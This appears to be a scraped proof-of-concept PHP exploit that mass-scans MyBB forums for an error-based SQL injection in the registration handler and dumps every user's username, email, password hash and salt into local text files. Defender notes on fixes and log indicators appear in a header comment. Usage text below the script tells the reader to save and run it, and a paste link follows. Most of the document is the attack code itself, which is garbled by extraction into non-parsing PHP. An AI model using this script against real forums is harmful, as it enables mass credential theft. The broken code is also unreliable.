<?php /*
 * Proof-of-concept for an error-based SQL injection in the MyBB registration
 * handler (member.php), kept exactly as captured. Extraction has altered
 * spacing and letter case throughout (for example "? >", "$get _website",
 * "$i + +"), so the listing does not parse as PHP in this form.
 *
 * Flow, as far as the visible code shows:
 *   - Top level: renders a form with a "Siteler" textarea, creates a
 *     "Dumpsss" directory if it is missing, splits the submitted text into
 *     one URL per line, and for each URL calls checkvulnerable() and then
 *     Inject() when the check returns true.
 *   - checkvulnerable($site): POSTs a filled-in registration form whose
 *     question_id value is a lone single quote and returns true when the
 *     response body contains the database error text it searches for.
 *   - Inject($site): repeats the registration POST with a polygon(...)
 *     subquery in question_id and reads the value back out of the error
 *     text in the response with preg_match(). The first request asks for
 *     the row count of mybb_users; the loop then requests one row at a time
 *     (username, email, password, salt joined by ":"), echoes each record
 *     and appends it to a per-host .txt file under the dump directory.
 *   - HttpPost($site, $post): cURL POST that returns the response body.
 *
 * Review notes for defenders:
 *   - The technique only works if question_id reaches a SQL statement
 *     without being validated and if the database error message is sent
 *     back to the client. Validating question_id as an integer (or binding
 *     it as a query parameter) and hiding database errors from visitors
 *     each break it. The page names no affected or fixed version; confirm
 *     against the vendor advisory.
 *   - Log indicators: POST requests to member.php with action=do_register
 *     whose question_id contains a quote, "polygon(", "select" or
 *     "mybb_users". The fixed form values in this sample (username=makman,
 *     imagehash=1c1d0e6eae9c113f4ff65339e4b3079c, regtime=1416039333) can
 *     be matched as well, but are trivially changed.
 *   - If matching requests returned SQL error text, treat the password and
 *     salt values of every account as disclosed and reset credentials.
 */ error_reporting (0);? ><form method= "POST" action= "" >input a Url (for example:http://myskins.org/18/) : <br><textarea name= "Siteler" cols= "rows=" 7 "></textarea><br><br><input type=" Submit "value=" Get it! "></form><?php Ob_start (); set_time_limit (0); if (!file_exists (" Dumpsss ")) mkdir (" Dumpsss "); $_post[' Siteler ']== "") {$siteler = explode ("\ n", $_post[' Siteler '), foreach ($siteler as $sites) {$sites =trim ($sites); if (checkvulnerable ($sites)) {echo "[+] $sites is vulnerable!\n"; Inject ($sites); } else {echo "[-] Target is not vulnerable\n"; }}}} else {}function Inject ($site) {$get _website = Parse_url ($site); $website = $get _website["host"]; $html = HttpPost ("$site/member.php", "Regcheck1=®check2=true&username=makman&password=mukarram &password2=mukarram&[email protected]&[email protected]&referrername=& Imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice= 1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step= Registration&action=do_register®submit=submit+registration!&question_id= ' or polygon (select*from (Select*from (select COUNT (*) from mybb_users LIMIT 0,1) f) x))---"); Preg_match ('!select \ ' (. 
*) \ ' as!s ', $html, $matches); $count = $matches [1]; echo "[+] Count: $count \ n"; for ($i = 0; $i <= $count; $i + +) {if ($count = = 1) {$num = "0,1"; } else {$num = "$i, 1"; } $html = HttpPost ("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&am p;password2=mukarram&[email protected]&[email protected]&referrername=&imagestring= f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1& Pmnotice=1&subscriPtionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action =do_register®submit=submit+registration!&question_id= ' or Polygon ((Select*from (Select*from (select Concat (Username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num) f) x))---"); Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches); if (Isset ($matches [1])) {$split = Explode (":", $matches [1]); $username = $split [0]; $email = $split [1]; $password = $split [2]; $salt = $split [3]; echo "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \ n------\ n"; File_put_contents ("dumpsss/$website. 
txt", "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \ n------\ nthe ", file_append); }}}function checkvulnerable ($site) {$ch = Curl_init (); $html = HttpPost ("$site/member.php", "Regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=& imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1& Receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time= 1416039333&step=registration&action=do_register®submit=submit+registration!&question_id= ' ") ; if (Strpos ($html, "You have the error in your SQL syntax")!==false) {return true; } else {return false; }}function HttpPost ($site, $post) {$ch = Curl_init (); curl_setopt ($ch, Curlopt_url, "$site/member.php"); curl_setopt ($ch, Curlopt_returntransfer, true); curl_setopt ($ch, Curlopt_postfields, $post); $html = curl_exec ($ch); Curl_close ($ch); return $html;}? >
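Save the script as xxx.php and run it from a web page. A Dumpsss folder is created in the current directory; if the target is vulnerable, the site's member records are exported to a TXT file inside that folder. Each exported record holds the username, e-mail, password and salt fields, so a forum whose logs show these requests should treat every account's credentials as exposed.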
If there is no vulnerability, you will be prompted: [-] Target is not vulnerable
Code online View \:HTTPS://GHOSTBIN.COM/PASTE/ZS2MP
MYBB SQL Injection Vulnerability